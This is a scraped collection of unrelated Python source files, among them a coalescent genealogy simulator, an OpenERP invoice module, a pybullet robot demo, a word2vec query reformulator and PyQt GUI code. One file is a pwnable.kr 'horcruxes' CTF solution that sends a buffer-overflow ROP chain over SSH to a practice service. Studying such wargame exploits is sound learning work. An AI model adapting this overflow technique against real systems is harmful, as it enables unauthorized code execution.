samples/ancestors available for merging\nmu = 63; #mutation rate\nn = 5\n\n\n# In[163]:\n\nclass Sample:\n def __init__(self, left = None, right = None, ic = identity_count):\n global identity_count;\n self.identity = identity_count;\n self.bigPivot = identity_count;#will be used as a signal in choosin left/right child when constructing tree\n identity_count += 1;#Everytime a sample is created, increases by one to ensure unique identity for every sample created\n self.left = left\n self.right = right\n self.next = None;\n self.time = 0;\n self.total_time = 0\n self.descendent_list = []#what diff? all children\n self.children_list = []#what diff? direct children after one generation\n self.mutations = 0\n def getIdentity(self):\n return self.identity;\n def getMutations(self):\n return self.mutations;\n def getChildrenList(self):\n return self.children_list;\n def __repr__(self): \n return 'This sample\\'s unique identity number is: ' + str(self.identity) + ', and its coalescent time to direct ancestor is: ' + str(self.time) + ', and its number of mutations is: ' + str(self.mutations) \n\n\n# In[164]:\n\nclass Ancestors(Sample):\n def __init__(self):\n Sample.__init__(self);\n self.identity = 'A' + str(identity_count - (sample_size + 1))\n self.mutations = 0\n def getIdentity(self):#overriding\n return self.identity;\n def getMutations(self):\n return self.mutations;\n def __repr__(self): \n return 'This ancestor\\'s unique identity is: ' + str(self.identity) + ', and its coalescent time to direct ancestor is: ' + str(self.time) + ', and its number of mutations is: ' + str(self.mutations) \n\n\n# In[165]:\n\ndef kingmanF(n):\n return n*(n-1) / 2\n #return comb(n, 2, exact = False)\n\n\n# In[166]:\n\ndef bsF(n, mn_rate, coalescent_list):\n total_rate = 0;\n for m in range (2, len(coalescent_list)+1):\n i_rate = len(coalescent_list) / (m * (m-1));\n mn_rate.append(i_rate)\n total_rate += i_rate\n return total_rate\n\n\n# In[167]:\n\ndef updateDescendentList(children_list):\n temp_list = [];\n for i in range(0, len(children_list)):\n identity = str(children_list[i].getIdentity())\n if not 'A' in identity:\n temp_list.append(children_list[i])\n else:\n for j in range(0, len(children_list[i].descendent_list)):\n temp_list.append(children_list[i].descendent_list[j])\n insertionSort(temp_list)\n return temp_list\n\n\n# In[168]:\n\ndef insertionSort(children_list):\n for i in range(1, len(children_list)):\n current = children_list[i].bigPivot\n current_child = children_list[i]\n position = i\n while (position > 0) & (children_list[position - 1].bigPivot > current):\n children_list[position] = children_list[position - 1]\n position = position - 1\n children_list[position] = current_child\n\n\n# In[169]:\n\ndef createChild(coalescent_list, parent, children_list):\n insertionSort(children_list)\n parent.children_list = children_list\n parent.descendent_list = updateDescendentList(children_list)\n parent.right = children_list[len(children_list) - 1]\n for i in range (len(children_list) - 1, 0, -1):\n children_list[i].next = children_list[i - 1]\n coalescent_list.remove(children_list[i])\n parent.left = children_list[0]\n parent.bigPivot = children_list[len(children_list) - 1].bigPivot\n coalescent_list.remove(children_list[0])\n\n\n# In[170]:\n\ndef updateTime(parent, children_list, time):\n highest_time = children_list[0].total_time + time\n highest_index = []\n highest_index.append(0)\n for i in range (1, len(children_list)):\n this_time = children_list[i].total_time + time\n if this_time > highest_time:\n highest_time = this_time\n highest_index.clear();\n highest_index.append(i);\n elif this_time == highest_time:\n highest_index.append(i)\n for i in range (0, len(highest_index)):\n children_list[highest_index[i]].time = time\n children_list[highest_index[i]].total_time += children_list[highest_index[i]].time\n for i in range (0, len(children_list)):\n for j in range (0, len(highest_index)):\n if i == highest_index[j]:\n break\n else:\n children_list[i].time = highest_time - children_list[i].total_time \n temp_time = children_list[i].total_time\n children_list[i].total_time += children_list[i].time\n parent.total_time = parent.total_time + highest_time\n\n\n# In[171]:\n\ndef mergeKingman(coalescent_list):\n children_list = np.random.choice(coalescent_list, 2, replace=False)#two chosen at random\n merge_sample = Ancestors();\n coalescent_list.append(merge_sample);\n createChild(coalescent_list, merge_sample, children_list)\n time = np.random.exponential(1/kingmanF(len(coalescent_list) + 1)) \n updateTime(merge_sample, children_list, time)\n return coalescent_list;\n\n\n# In[172]:\n\ndef mergeBSF(m_list, coalescent_list):\n mn_rate = [];\n bsF_rate = [];\n total_rate = bsF(sample_size, mn_rate, coalescent_list)\n for i in range (0, len(mn_rate)):\n bsF_rate.append(mn_rate[i] / total_rate)\n m = np.random.choice(m_list, 1, replace = False, p = bsF_rate)\n children = np.random.choice(coalescent_list, m, replace = False);\n merge_sample = Ancestors();\n createChild(coalescent_list, merge_sample, children)\n coalescent_list.append(merge_sample);\n time = np.random.exponential(1/total_rate) \n updateTime(merge_sample, children, time)\n return coalescent_list;\n\n\n# In[173]:\n\ndef newick(sample, n):#recursive? yes, but need a helper method\n output = ''\n output = recurNewick((output + '('), sample.right, n)\n current = sample.right\n while current.next != sample.left:\n output = recurNewick(output+ ', ', current.next, n)\n current = current.next\n output = recurNewick(output + ', ', sample.left, n) + ')' + str(sample.getIdentity());\n return output; \n\n\n# In[174]:\n\ndef recurNewick(output, sample, n):\n #global total_branch_length\n #base case\n if (sample.left == None) & (sample.right == None):\n if n == 1:\n output = output + str(sample.getIdentity()) + ':{0:.{1}f}'.format(sample.time, 10)\n return output\n else:\n output = output + str(sample.getIdentity()) + ':' + str(sample.mutations)\n return output\n output = recurNewick((output + '('), sample.right, n)\n current = sample.right\n while current.next != sample.left:\n output = recurNewick(output + ', ', current.next, n)\n current = current.next\n if n == 1:\n output = recurNewick((output + ', '), sample.left, n) + ')' + str(sample.getIdentity()) + ':{0:.{1}f}'.format(sample.time, 10)\n else:\n output = recurNewick((output + ', '), sample.left, n) + ')' + str(sample.getIdentity()) + ':' + str(sample.mutations)\n return output\n\n\n# In[175]:\n\ndef analysis(sample):\n mean_sep_time = 0;\n mean_sep_time = recurTraversal(mean_sep_time, sample.right)\n current = sample.right\n while current.next != None:\n mean_sep_time = recurTraversal(mean_sep_time, current.next)\n current = current.next\n return mean_sep_time\n\n\n# In[176]:\n\ndef recurTraversal(mean_sep_time, sample):\n #base case\n global total_branch_length\n weight = 0;\n if (sample.left == None) & (sample.right == None):\n total_branch_length += sample.time\n identity = str(sample.getIdentity())\n if not 'A' in identity:\n k = 1\n else:\n k = len(sample.descendent_list)\n weight = ( k * (sample_size - k)) / comb(sample_size, 2);\n mean_sep_time = mean_sep_time + (weight * sample.time);\n sample.mutations = poisson.rvs(mu * sample.time)\n return mean_sep_time\n mean_sep_time = recurTraversal(mean_sep_time, sample.right)\n current = sample.right\n while current.next != None:\n mean_sep_time = recurTraversal(mean_sep_time, current.next)\n current = current.next\n total_branch_length += sample.time\n identity = str(sample.getIdentity())\n if not 'A' in identity:\n k = 1\n else:\n k = len(sample.descendent_list)\n weight = ( k * (sample_size - k)) / comb(sample_size, 2);\n mean_sep_time = mean_sep_time + (weight * sample.time);\n sample.mutations = poisson.rvs(mu * sample.time)\n return mean_sep_time\n\n\n# In[177]:\n\n#main instructions\nlist1 = []\nlist2 = []\nlist3 = []\nlist4 = []\nfor p in range (0, n):\n if mode == 3:\n identity_count = 1;\n coalescent_list1 = []\n coalescent_list2 = []\n for i in range(0, sample_size): \n new_sample1 = Sample();\n coalescent_list1.append(new_sample1);\n identity_count = identity_count - 1\n new_sample2 = Sample();\n coalescent_list2.append(new_sample2);\n ic = identity_count\n else: \n coalescent_list = []\n for i in range(0, sample_size): \n new_sample = Sample();\n coalescent_list.append(new_sample);\n\n #main instruction: loop until the most recent commont ancestor MRCA is reached.\n if mode == 1:#Kingman\n while len(coalescent_list) > 1:\n coalescent_list = mergeKingman(coalescent_list);\n elif mode == 2:#Bolthausen-Sznitman\n while len(coalescent_list) > 1:\n m_list = [];\n for i in range (2, len(coalescent_list) + 1):\n m_list.append(i);\n coalescent_list = mergeBSF(m_list, coalescent_list)\n else: #mode ==3 : Both Kingman and BS\n #1: kingman\n while len(coalescent_list1) > 1:\n coalescent_list1 = mergeKingman(coalescent_list1);\n k_ancestor = coalescent_list1.pop(); \n total_branch_length = 0;\n newickForm1 = newick(k_ancestor, 1)#tree in terms of time\n mean_time1 = analysis(k_ancestor)#analysis computes 1) heterozygosity, 2) total branch length, 3) number of mutations\n newickForm2 = newick(k_ancestor, 2)\n newickTBL = total_branch_length\n newickForm1 = str(newickForm1)\n newickForm2 = str(newickForm2)\n handle1 = StringIO(newickForm1)\n handle2 = StringIO(newickForm2)\n tree1 = Phylo.read(handle1, 'newick')\n tree2 = Phylo.read(handle2, 'newick')\n\n list1.append(tree1)\n list2.append(tree2)\n \n identity_count = ic;\n #2: BS\n while len(coalescent_list2) > 1: \n m_list = [];\n for i in range (2, len(coalescent_list2) + 1):\n m_list.append(i);\n coalescent_list2 = mergeBSF(m_list, coalescent_list2)\n BSF_ancestor = coalescent_list2.pop();\n total_branch_length = 0;\n newickForm3 = newick(BSF_ancestor, 1)#tree in terms of time\n mean_time2 = analysis(BSF_ancestor)#analysis computes 1) heterozygosity, 2) total branch length, 3) number of mutations\n newickForm4 = newick(BSF_ancestor, 2)\n BSF_TBL = total_branch_length; \n newickForm3 = str(newickForm3)\n newickForm4 = str(newickForm4)\n handle3 = StringIO(newickForm3)\n handle4 = StringIO(newickForm4)\n tree3 = Phylo.read(handle3, 'newick')\n tree4 = Phylo.read(handle4, 'newick')\n\n list3.append(tree3)\n list4.append(tree4)\n \n\n\n #else:\n # common_ancestor = coalescent_list.pop();\n # total_branch_length = 0;\n # newickForm1 = newick(common_ancestor, 1)#tree in terms of time\n # mean_time = analysis(common_ancestor)#analysis computes 1) heterozygosity, 2) total branch length, 3) number of mutations\n # newickForm2 = newick(common_ancestor, 2) \n\n\n# In[178]:\n\nfor p in range(0, n):\n print(p)\n Phylo.draw(list1[p])\n Phylo.draw(list2[p])\n Phylo.draw(list3[p])\n Phylo.draw(list4[p])\n #list5 = []\n #list5.append(list2[p])\n #list5.append(list4[p])\n #f_list = np.random.choice(list5, 2, replace=False)\n #Phylo.draw(f_list[0])\n #Phylo.draw(f_list[1])\n\n\n# In[ ]:\n\n\n\n","sub_path":"11-04 Clean.py","file_name":"11-04 Clean.py","file_ext":"py","file_size_in_byte":13014,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"45570781","text":"from selenium.webdriver.common.by import By\nfrom time import sleep\nfrom homework.pageobject.page.basepage import BasePage\n\n\nclass AddDepartmentPage(BasePage):\n def add_department(self, name):\n self.driver.find_element(By.CSS_SELECTOR, '[name=name]').send_keys(name)\n self.driver.find_element(By.CSS_SELECTOR, \".js_parent_party_name\").click()\n self.driver.find_element(By.CSS_SELECTOR, \".qui_dialog_body.ww_dialog_body [id='1688852051058674_anchor']\").click()\n self.driver.find_element(By.CSS_SELECTOR, \"[id=__dialog__MNDialog__] div>div>a:nth-child(1)\").click()\n sleep(3)\n ele_list = self.driver.find_elements(By.CSS_SELECTOR, \".jstree-node.js_editable.jstree-leaf\")\n name_list = [i.text for i in ele_list]\n return name_list\n","sub_path":"homework/pageobject/page/add_department_page.py","file_name":"add_department_page.py","file_ext":"py","file_size_in_byte":784,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"91550731","text":"# -*- encoding: utf-8 -*-\n#\n#\n# Copyright (C) 2011 Associazione OpenERP Italia\n# ().\n#\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU Affero General Public License as published\n# by the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU Affero General Public License\n# along with this program. If not, see .\n#\n#\n\nfrom osv import fields, osv\nfrom tools.translate import _\n\n\nclass account_invoice(osv.osv):\n _inherit = 'account.invoice'\n _columns = {\n 'corrispettivo': fields.boolean('Corrispettivo'),\n }\n\n def onchange_company_id(\n self, cr, uid, ids, company_id, part_id, _type, invoice_line,\n currency_id, context=None\n ):\n if not context:\n context = {}\n journal_obj = self.pool.get('account.journal')\n res = super(account_invoice, self).onchange_company_id(\n cr, uid, ids, company_id, part_id,\n _type, invoice_line, currency_id)\n is_corrispettivo = context.get('corrispettivo', False)\n corr_journal_ids = journal_obj.search(\n cr, uid,\n [('corrispettivi', '=', True), ('company_id', '=', company_id)])\n\n # Se è un corrispettivo e la company ha almeno un sezionale\n # corrispettivi\n if is_corrispettivo and corr_journal_ids:\n res['value']['journal_id'] = corr_journal_ids[0]\n\n # Se la company ha almeno un sezionale corrispettivi ma l'invoice non è\n # un corrispettivo\n elif (\n corr_journal_ids\n and corr_journal_ids[0] in res['domain']['journal_id'][0][2]\n ):\n # Se l'on_change di invoice ha impostato il journal corrispettivi\n if (\n corr_journal_ids[0] == res['value']['journal_id']\n and len(res['domain']['journal_id'][0][2]) > 1\n ):\n for j_id in res['domain']['journal_id'][0][2]:\n if corr_journal_ids[0] != j_id:\n res['value']['journal_id'] = j_id\n break\n return res\n\n def _get_account(self, cr, uid, context=None):\n if context is None:\n context = {}\n is_corrispettivo = context.get('corrispettivo', False)\n res = False\n if is_corrispettivo:\n partner_obj = partner_ids = self.pool.get('res.partner')\n partner_ids = partner_obj.search(\n cr, uid, [('corrispettivi', '=', True)])\n if not partner_ids:\n raise osv.except_osv(_('Error!'),\n _('No partner \"corrispettivi\" found'))\n partner = partner_obj.browse(cr, uid, partner_ids[0])\n res = partner.property_account_receivable.id\n return res\n\n def _get_partner_id(self, cr, uid, context=None):\n if context is None:\n context = {}\n is_corrispettivo = context.get('corrispettivo', False)\n res = False\n if is_corrispettivo:\n partner_obj = partner_ids = self.pool.get('res.partner')\n partner_ids = partner_obj.search(\n cr, uid, [('corrispettivi', '=', True)])\n if not partner_ids:\n raise osv.except_osv(_('Error!'),\n _('No partner \"corrispettivi\" found'))\n res = partner_ids[0]\n return res\n\n def onchange_corrispettivo(\n self, cr, uid, ids, corrispettivo=False, context=None\n ):\n res = {}\n user_obj = self.pool.get('res.users')\n journal_obj = self.pool.get('account.journal')\n company_id = user_obj.browse(cr, uid, uid).company_id.id\n corr_journal_ids = journal_obj.search(\n cr, uid,\n [('corrispettivi', '=', True), ('company_id', '=', company_id)])\n if corr_journal_ids and corrispettivo:\n res = {'value': {'journal_id': corr_journal_ids[0]}}\n return res\n\n _defaults = {\n 'partner_id': _get_partner_id,\n 'account_id': _get_account,\n }\n\naccount_invoice()\n\n\nclass account_journal(osv.osv):\n _inherit = 'account.journal'\n _columns = {\n 'corrispettivi': fields.boolean('Corrispettivi'),\n }\naccount_journal()\n\n\nclass res_partner(osv.osv):\n _inherit = 'res.partner'\n _columns = {\n 'corrispettivi': fields.boolean('Corrispettivi'),\n }\nres_partner()\n","sub_path":"l10n_it_corrispettivi/account.py","file_name":"account.py","file_ext":"py","file_size_in_byte":4817,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"88326453","text":"import pybullet as p\nimport time\nimport pybullet_data as pd\nimport numpy as np\np.connect(p.GUI)\np.setAdditionalSearchPath(pd.getDataPath())\ndt = 1./240.\n\np.configureDebugVisualizer(p.COV_ENABLE_RENDERING,0)\np.loadURDF(\"plane.urdf\")\nrobot = p.loadURDF(\"aliengo/aliengo.urdf\",[0,0,0.5])\np.configureDebugVisualizer(p.COV_ENABLE_RENDERING,1)\np.setGravity(0,0,-9.8)\n\nALIENGO_DEFAULT_ABDUCTION_ANGLE = 0\nALIENGO_DEFAULT_HIP_ANGLE = 1.2\nALIENGO_DEFAULT_KNEE_ANGLE = -2.0\nNUM_LEGS = 4\nINIT_MOTOR_ANGLES = np.array([\n ALIENGO_DEFAULT_ABDUCTION_ANGLE,\n ALIENGO_DEFAULT_HIP_ANGLE,\n ALIENGO_DEFAULT_KNEE_ANGLE\n] * NUM_LEGS)\n\nMOTOR_NAMES = [\n \"FR_hip_joint\",\n \"FR_upper_joint\",\n \"FR_lower_joint\",\n \"FL_hip_joint\",\n \"FL_upper_joint\",\n \"FL_lower_joint\",\n \"RR_hip_joint\",\n \"RR_upper_joint\",\n \"RR_lower_joint\",\n \"RL_hip_joint\",\n \"RL_upper_joint\",\n \"RL_lower_joint\",\n]\nmotor_ids = []\n\nfor j in range (p.getNumJoints(robot)):\n joint_info = p.getJointInfo(robot,j)\n name = joint_info[1].decode('utf-8')\n print(\"joint_info[1]=\",name)\n if name in MOTOR_NAMES:\n motor_ids.append(j)\n\nfor index in range (12):\n joint_id = motor_ids[index]\n p.setJointMotorControl2(robot, joint_id, p.POSITION_CONTROL, INIT_MOTOR_ANGLES[index])\n p.resetJointState(robot, joint_id, INIT_MOTOR_ANGLES[index])\n \nprint(\"motor_ids=\",motor_ids)\nwhile p.isConnected():\n p.stepSimulation()\n time.sleep(dt)\n\n\n","sub_path":"examples/pybullet/gym/pybullet_data/aliengo/aliengo.py","file_name":"aliengo.py","file_ext":"py","file_size_in_byte":1415,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"207817300","text":"import collections\r\n\r\nclass Board:\r\n def reset():\r\n pass\r\n\r\nfrom iolib import *\r\n\r\nclass gui:\r\n def text_in(self,msg):\r\n print(msg)\r\n\r\nclass CMD_Handler(object):\r\n\r\n cmditem = collections.namedtuple('CMD_Env', ('func', 'args', 'kwargs', 'help', 'argnames', 'para_names'))\r\n \r\n commands = {\r\n 'reset': cmditem(Board.reset, '', '', 'Reset the board', (), ()),\r\n 'save': cmditem(save, 'index', '-i', 'Save board to file ', ('index',), ('i',)),\r\n 'load': cmditem(load, 'index', '-i', 'Load board from file ', ('index',), ('i',)),\r\n 'savelocal': cmditem(savelocal, 'index', '-i', 'Save board to RAM as ', ('index',), ('i',)),\r\n 'loadlocal': cmditem(loadlocal, 'index', '-i', 'Load board from RAM', ('index',), ('i',)),\r\n 'set': cmditem(setpiece, 'x, y, piece, color', '-x, -y, -p, -c',\r\n ('Place a piece on board. x is a number or a letter. color can be the full' +\r\n ' color or just \\'w\\' or \\'b\\'. The same goes for piece'), ('x', 'y', 'piece', 'color'), ('x', 'y', 'p', 'c')) \r\n }\r\n \r\n def __init__(self, board, gui):\r\n self.board = board\r\n self.gui = gui\r\n\r\n def add_command(self, command, function):\r\n self.commands.append((command, function))\r\n\r\n def parse_command(self, command):\r\n if command == 'help':\r\n for command, data in self.commands.items():\r\n self.gui.text_in('{}: {}, {} - {}'.format(command, data.args, data.kwargs, data.help))\r\n else:\r\n for cmd, data in self.commands.items():\r\n if command == cmd:\r\n args = command.replace(cmd, '').split()\r\n if args[0] == 'help':\r\n self.gui.text_in('{}:\\n{}\\n{}\\n{}'.format(cmd, data.help, data.args, data.kwargs))\r\n else:\r\n cmdargs = list()\r\n for arg in args:\r\n if arg.startswith('-'):\r\n arg = arg.replace('-', '')\r\n for kwarg in data.para_names:\r\n if arg[:len(kwarg)] == kwarg:\r\n cmdargs.append(arg[len(kwarg):])\r\n else:\r\n cmdargs.append(arg)\r\n try:\r\n print(cmdargs)\r\n except UnboundLocalError:\r\n pass\r\n \r\n \r\n \r\n \r\n","sub_path":"cmd.py","file_name":"cmd.py","file_ext":"py","file_size_in_byte":2631,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"270665703","text":"import serial, sys\nimport syslog\nimport time\n\n#The following line is for serial over GPIO\nport = sys.argv[1]\nspeed = sys.argv[2]\n\nser = serial.Serial(port,speed)\n\nwhile True:\n # Serial read section\n line = ser.readline()\n line2=line.strip().decode('utf-8')\n data = [str(val) for val in line2.split(\",\")]\n print (\"data array from arduino: \")\n print (data)\nexit()","sub_path":"read_ser_01.py","file_name":"read_ser_01.py","file_ext":"py","file_size_in_byte":379,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"575604800","text":"import logging\nimport operator\nimport pickle\n\nfrom gensim.models.word2vec import Word2Vec\nfrom ..constants import *\nfrom ..processing.normalize import Normalizer\n\n\nclass Vectorizer(object):\n def train(self, corpus, api, min_count):\n \"\"\"\n :param corpus: snippets, list or another iterable\n :param api: API elements to use for reformulation: classes, methods, etc.\n :param min_count: threshold for term occurrence to be included in the model\n :return:\n \"\"\"\n try:\n self.model = Word2Vec(corpus, sg=0, min_count=min_count, workers=4)\n self.storage = api\n self.model.init_sims(True)\n except RuntimeError as re:\n logging.warning(re)\n\n def save(self, path, base_name, info=None):\n \"\"\"\n Saves the model\n :param path: folder to save the model\n :param base_name: extentions are connected to the base name\n :param info: additional info about file type\n :return:\n \"\"\"\n\n if not hasattr(self, \"model\"):\n return\n base = os.path.join(path, base_name)\n self.model.save(fname_or_handle=base + INDEX_EXT)\n with open(base + CLASSES_EXT, 'w') as fp:\n pickle.dump(self.storage, fp)\n with open(base + INFO_EXT, 'w') as fp:\n pickle.dump(info, fp)\n\n def load(self, path, base_name):\n \"\"\"\n Loads the model to the memory\n :param path: base folder path\n :param base_name: name of the file, extentions are connected automatically\n :return:\n \"\"\"\n info = None\n base = os.path.join(path, base_name)\n self.model = Word2Vec.load(fname=base + INDEX_EXT)\n # self.model.init_sims(True)\n with open(base + CLASSES_EXT, 'r') as fp:\n self.storage = pickle.load(fp)\n if os.path.exists(base + INFO_EXT):\n with open(base + INFO_EXT, 'r') as fp:\n info = pickle.load(fp)\n return info\n\n def reformulate(self, sentence, num_res=NUM_RESULTS, public_only=False,\n num_candidates=NUM_CANDIDATES):\n \"\"\"\n Takes the sentence, cleans it and reformulates\n :param sentence: list of words\n :param num_res: number of output terms\n :param public_only: use only public API methods\n :param num_candidates: number of candidate terms for further filtration\n :return: list of reformulated terms\n \"\"\"\n if not hasattr(self, \"model\"):\n logging.warning(\"No trained model\")\n return []\n\n sentence = [s for s in sentence if s in self.model]\n logging.info(\n \"Terms of the normalized query that present in the corpus: %s\" % ' '.join(sentence))\n\n if not sentence:\n return []\n\n # TODO pre-compute class_similarity\n storage = self.storage\n if public_only:\n storage = self._public_storage()\n res = {}\n for w in storage:\n if w in self.model:\n res[w] = self.model.n_similarity(sentence, [w])\n\n sorted_candidates = sorted(res.items(), key=operator.itemgetter(1), reverse=True)\n\n candidate_names_counts = [(k, storage[k].count) for (k, v) in\n sorted_candidates[:num_candidates]]\n\n sorted_candidate_names_counts = sorted(candidate_names_counts, key=operator.itemgetter(1),\n reverse=True)\n logging.info(\"Candidates: %s\" % ' '.join([k for (k, v) in sorted_candidate_names_counts]))\n return [storage[k].name for (k, v) in sorted_candidate_names_counts[:num_res]]\n\n def normalize_and_reformulate(self, query, all_asts=False):\n \"\"\"\n Normalizes and reformulates raw query\n :param query: input string\n :return: list of ASTs as reformulation\n \"\"\"\n normalizer = Normalizer()\n normalized_query = normalizer.process_query(query)\n logging.info(\"Normalized query: %s\" % ' '.join(normalized_query))\n res = self.reformulate(normalized_query, public_only=not all_asts)\n return res\n\n def _public_storage(self):\n return {k: self.storage[k] for k in self.storage if self.storage[k].publicapi}\n","sub_path":"reform/processing/vectorize.py","file_name":"vectorize.py","file_ext":"py","file_size_in_byte":4263,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"486716729","text":"#coding=utf-8\nfrom pwn import *\ncontext.log_level = 'debug'\nr = ssh(host='pwnable.kr', user='horcruxes', password='guest', port=2222)\nc = r.connect_remote('localhost', 9032)\n\n# rop 链\n\nA = 0x809fe4b\nB = 0x809fe6a\nC = 0x809fe89\nD = 0x809fea8\nE = 0x809fec7\nF = 0x809fee6\nG = 0x809ff05\nropme = 0x809fffc # 注意这里只能是0x809fffc,也就是main里面 call ropme的地址,因为ropme这个函数所有地址都不能被返回\nc.recvuntil(\"Select Menu:\")\nc.sendline('1')\nc.recvuntil(' : ')\nshellcode=''\n# 0x78个A是因为s的地址是ebp-0x74,返回地址在ebp+4,所以需要填充0x78个A\nshellcode+='A'*0x78+p32(A)+p32(B)+p32(C)+p32(D)+p32(E)+p32(F)+p32(G)+p32(ropme)\nc.sendline(shellcode)\nc.recvline()\nsum = 0\nfor i in range(7):\n s = c.recvline()\n n = int(s.strip('\\n').split('+')[1][:-1])\n sum += n\nc.recvuntil('Menu:')\nc.sendline('1')\nc.recvuntil(' : ')\nc.sendline(str(sum))\nc.recv()\n","sub_path":"kr_pwnable/21_horcruxes/solve.py","file_name":"solve.py","file_ext":"py","file_size_in_byte":912,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"331790679","text":"#! python3\n# sandwichMaker.py -> prompts user for their sandwich preferences\n\nimport pyinputplus as pypi\n\nprices = {\"wheat\": 1.00, 'white': 0.50, 'sourdough': 0.75,\n \"chicken\": 2.50, \"turkey\": 2.25, \"ham\": 2.00, \"tofu\": 1.50,\n \"cheddar\": 0.75, \"swiss\": 0.85, \"mozzarella\": 1.00,\n \"condiments\": 1.00\n }\n\nnumSandwich = pypi.inputInt('How many sandwiches would you like? \\n', greaterThan=1)\ntotPrice = 0\n\nfor i in range(1, numSandwich+1):\n print('Please enter your preferences for Sandwich #{}:'.format(i))\n bread = pypi.inputMenu(['wheat', 'white', 'sourdough'])\n protein = pypi.inputMenu(['chicken', 'turkey', 'ham', 'tofu'])\n _cheese = pypi.inputYesNo(\"Would you like cheese?\\n\")\n if _cheese.lower() == 'yes':\n cheese = pypi.inputMenu(['cheddar', 'swiss', 'mozzarella'])\n condiments = pypi.inputYesNo(\"Would you like mayo, mustard, lettuce or tomato?\\n\")\n if condiments.lower() == 'yes':\n condiments = \"condiments\"\n print(\"Total price of Sandwich #{} is ${}\\n\".format(i, round(prices[bread] + prices[protein] + prices[cheese] + prices[condiments], 2)))\n totPrice = prices[bread] + prices[protein] + prices[cheese] + prices[condiments]\n else:\n print(\"Total price of Sandwich #{} is ${}\\n\".format(i, round(prices[bread] + prices[protein] + prices[cheese], 2)))\n totPrice += prices[bread] + prices[protein] + prices[cheese]\n else:\n condiments = pypi.inputYesNo(\"Would you like mayo, mustard, lettuce or tomato?\\n\")\n if condiments.lower() == 'yes':\n condiments = \"condiments\"\n print(\"Total price of Sandwich #{} is ${}\\n\".format(i, round(prices[bread] + prices[protein] + prices[condiments], 2)))\n totPrice = prices[bread] + prices[protein] + prices[condiments]\n else:\n print(\"Total price of Sandwich #{} is ${}\\n\".format(i, round(prices[bread] + prices[protein], 2)))\n totPrice += prices[bread] + prices[protein]\n\nprint(\"Your total is ${} for the {} sandwiches\".format(round(totPrice, 2), numSandwich))\n","sub_path":"input_validation/sandwichMaker.py","file_name":"sandwichMaker.py","file_ext":"py","file_size_in_byte":2113,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"305665067","text":"# import helper\n# from helper import is_apple_in, name, say\n# from jinjohn.helper import is_apple_in, name, say\nimport jinjohn\n\na = 20\nb = 20\nc = [1,2,3]\nd = (1,2,3)\n\nprint(a,b,c,d)\n\nif a == 10:\n print(\"a is 10\")\nelif a == 20 and b ==20:\n print(\"a is 20\")\nelif a == 30:\n print(\"a is 30\")\nelse:\n print(\"a is nothing\")\n\nfruits = [\"Orange\", \"Apple\", \"Pineapple\"]\nfor fruit in fruits:\n if fruit == \"Apple\":\n print(\"Yes, I like it\")\n\n# print(helper.is_apple_in(fruits))\n# print(helper.name)\n# print(helper.say())\n\n# print(is_apple_in(fruits))\n# print(name)\n# print(say())\n\nprint(jinjohn.helper.is_apple_in(fruits))","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":631,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"146890096","text":"from PyQt5.QtWidgets import QDialog\r\nfrom PyQt5.uic import loadUi\r\nfrom PyQt5.QtWidgets import QApplication, QFileDialog, QMessageBox\r\nfrom tkinter import *\r\nfrom PyQt5 import QtCore, QtGui\r\nfrom PyQt5.QtGui import *\r\nimport cv2 as cv\r\n\r\nname_cascade_built = \"cascade1.xml\"\r\n\r\n\r\nclass ChangeCascade(QDialog):\r\n def __init__(self):\r\n super(ChangeCascade, self).__init__()\r\n loadUi('GuiChangeCascade.ui', self)\r\n\r\n\r\nclass MainWindow(QDialog):\r\n def __init__(self):\r\n super(MainWindow, self).__init__()\r\n self.w = ChangeCascade()\r\n loadUi('GuiMainWindow.ui', self)\r\n\r\n self.uploadImage.clicked.connect(self.browse_folder)\r\n self.changeCascade.clicked.connect(self.open_change_cascade)\r\n\r\n def browse_folder(self):\r\n name_cascade = name_cascade_built\r\n options = QFileDialog.Options()\r\n options |= QFileDialog.DontUseNativeDialog\r\n filename, _ = QFileDialog.getOpenFileName(self, \"Open File\", \"\",\r\n \"Images (*.png *.jpg)\", options=options)\r\n if filename:\r\n self.load_image(filename)\r\n self.erythrocytes.clicked.connect(lambda: self.cv_cascade(self, filename, \"erythrocyte\", name_cascade))\r\n self.thrombocytes.clicked.connect(lambda: self.cv_cascade(self, filename, \"thrombocyte\", name_cascade))\r\n self.monocytes.clicked.connect(lambda: self.cv_cascade(self, filename, \"monocyte\", name_cascade))\r\n self.lymphocytes.clicked.connect(lambda: self.cv_cascade(self, filename, \"lymphocyte\", name_cascade))\r\n self.neutrophils.clicked.connect(lambda: self.cv_cascade(self, filename, \"neutrophil\", name_cascade))\r\n else:\r\n print('Invalid Image')\r\n return filename\r\n\r\n def load_image(self, filename):\r\n pimp = QPixmap(filename)\r\n width = pimp.width()\r\n height = pimp.height()\r\n\r\n while height >= 800:\r\n height = height - 1\r\n\r\n while width >= 800:\r\n width = width - 1\r\n\r\n self.imageLabel.resize(width, height)\r\n pimp2 = QtGui.QImage(pimp).scaled(width, height, QtCore.Qt.KeepAspectRatio)\r\n self.imageLabel.setPixmap(QPixmap(pimp2))\r\n self.imageLabel.setAlignment(QtCore.Qt.AlignHorizontal_Mask)\r\n return pimp2\r\n\r\n @staticmethod\r\n def cv_cascade(self, pic, text, cascade):\r\n blood_cascade = 